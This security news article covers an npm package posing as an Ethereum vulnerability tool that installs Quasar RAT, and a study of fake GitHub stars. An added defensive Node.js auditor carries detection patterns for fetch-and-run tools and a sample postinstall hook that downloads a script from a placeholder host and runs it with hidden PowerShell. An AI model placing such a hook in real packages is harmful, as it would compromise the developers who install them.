    Malicious NPM Package Cloaked as Ethereum Tool Deploys Quasar RAT

    Cybersecurity researchers have identified a malicious npm package masquerading as a tool for detecting vulnerabilities in Ethereum smart contracts. Contrary to its purported purpose, the package covertly deploys Quasar RAT, an open-source remote access trojan, onto developer systems.

    The pernicious package, dubbed ethereumvulncontracthandler, was introduced to the npm repository on December 18, 2024, by an entity identified as “solidit-dev-416.” As of this writing, it remains accessible and has been downloaded 66 times.

    “Upon installation, the package fetches a malicious script from a remote host, executing it covertly to deliver the RAT onto Windows environments,” explained Socket security researcher Kirill Boychenko in a detailed analysis released last month.

    Obfuscation and Evasion Tactics

    The malicious payload within ethereumvulncontracthandler is heavily obfuscated with several layers, including Base64 encoding, XOR encoding, and minification. These layers hinder both manual analysis and automated detection by security tools.

    Additionally, the malware runs checks for sandboxed environments so that it does not execute in analysis setups. If no sandbox is detected, it acts as a loader, fetching a second-stage payload from a remote domain (“jujuju[.]lat”). That second stage uses PowerShell commands to launch Quasar RAT.
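
    As an added example (not code from the article or from Socket), the following Node.js script audits package manifests for the install-hook pattern the article describes: a lifecycle script that fetches a remote resource and hands it to PowerShell. The indicator patterns, package names and domain are assumptions constructed for illustration.

```javascript
// Added example (not from the article or from Socket): audit npm lifecycle
// scripts for the install-time pattern described above, i.e. a hook that
// fetches a remote script and hands it to PowerShell. Heuristics and samples
// are assumptions for illustration, not a published rule set.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Each indicator is a name plus a pattern matched against the hook command.
const INDICATORS = [
  { name: 'remote-fetch', re: /\b(curl|wget|Invoke-WebRequest|iwr)\b|https?:\/\//i },
  { name: 'powershell', re: /\bpowershell(\.exe)?\b|\bpwsh\b/i },
  { name: 'hidden-window', re: /-(w(indowstyle)?\s+hidden|nop|noprofile)\b/i },
  { name: 'encoded-payload', re: /-(enc|encodedcommand)\b|base64|fromCharCode/i },
  { name: 'dynamic-exec', re: /child_process|\beval\(|\bexec\(|\biex\b|Invoke-Expression/i },
];

// Inspect one package.json object; returns which hooks tripped which indicators.
function auditPackage(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== 'string') continue;
    const indicators = INDICATORS.filter((i) => i.re.test(command)).map((i) => i.name);
    if (indicators.length > 0) findings.push({ hook, indicators, command });
  }
  return { name: pkg.name, findings, suspicious: findings.length > 0 };
}

function auditAll(packages) {
  return packages.map(auditPackage);
}

// Constructed sample manifests: a benign native module and a hypothetical
// package whose postinstall hook mirrors the fetch-and-run behaviour above.
// The domain is a placeholder, not the real staging or C2 host.
const SAMPLES = [
  { name: 'benign-native-lib', scripts: { test: 'node test.js', postinstall: 'node-gyp rebuild' } },
  {
    name: 'example-evil-handler',
    scripts: {
      postinstall:
        "node -e \"require('child_process').exec('powershell -w hidden -nop -c iwr http://staging.example.invalid/s.ps1 | iex')\"",
    },
  },
];

for (const result of auditAll(SAMPLES)) console.log(JSON.stringify(result));
```

    Pointing auditAll at every package.json under node_modules turns this into a quick post-install triage pass; a hit is a reason to read the hook, not proof of compromise.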

    Stealth and Persistence Mechanisms

    Quasar RAT establishes persistence by modifying the Windows Registry and connects to a command-and-control (C2) server (“captchacdn[.]com:7000”). This channel is used to exfiltrate sensitive information and to receive further instructions from the attacker.

    Originally unveiled on GitHub in July 2014, Quasar RAT has served as a versatile tool for cybercrime and espionage, employed by numerous threat actors over the years.

    “The adversary utilizes this C2 server not only to monitor compromised systems but also to orchestrate multiple infected devices simultaneously, particularly if this operation is part of a botnet scheme,” Boychenko elaborated. “Once a victim’s system is breached, it is entirely under the attacker’s dominion, poised for ongoing exploitation.”

    The Growing Epidemic of Counterfeit GitHub Stars

    This revelation coincides with findings from a collaborative study by Socket, Carnegie Mellon University, and North Carolina State University, which uncovered a surge in counterfeit “stars” on GitHub. These stars are exploited to artificially amplify the visibility of malicious repositories.

    While the manipulation of stars is not a novel phenomenon, researchers found it predominantly promotes ephemeral malware repositories disguised as pirated software, gaming cheats, or cryptocurrency utilities. These repositories are often advertised via dubious platforms like Baddhi Shop and FollowDeh, which openly market GitHub engagement services.

    For example, Baddhi Shop sells 1,000 GitHub stars for $110, claiming to boost repository credibility. “Real engagement attracts more developers and contributors to your project!” boasts their promotional material.

    “Only a fraction of repositories leveraging fake star campaigns are listed on platforms like npm or PyPI,” the researchers noted. “Even fewer achieve significant adoption. Notably, 60% of accounts involved in such campaigns exhibit minimal activity beyond inflating star counts.”

    Mitigating Risks in the Open-Source Ecosystem

    Because the open-source software ecosystem is a frequent target for attackers, repository credibility must be assessed with care. Star counts alone, the study warns, are unreliable indicators of quality or reputation.

    In a statement issued in October 2023, GitHub acknowledged the prevalence of fake star campaigns and affirmed ongoing efforts to eradicate inauthentic activity.

    “The fundamental vulnerability of star counts as a metric lies in their uniform weighting of all user actions,” the researchers explained. “To counteract manipulation, GitHub might consider adopting a weighted popularity metric, factoring in dimensions such as network centrality, which are significantly harder to falsify.”

    By spotlighting this sophisticated npm package attack and the broader issue of counterfeit GitHub stars, these findings serve as a critical reminder of the evolving threats within the software supply chain.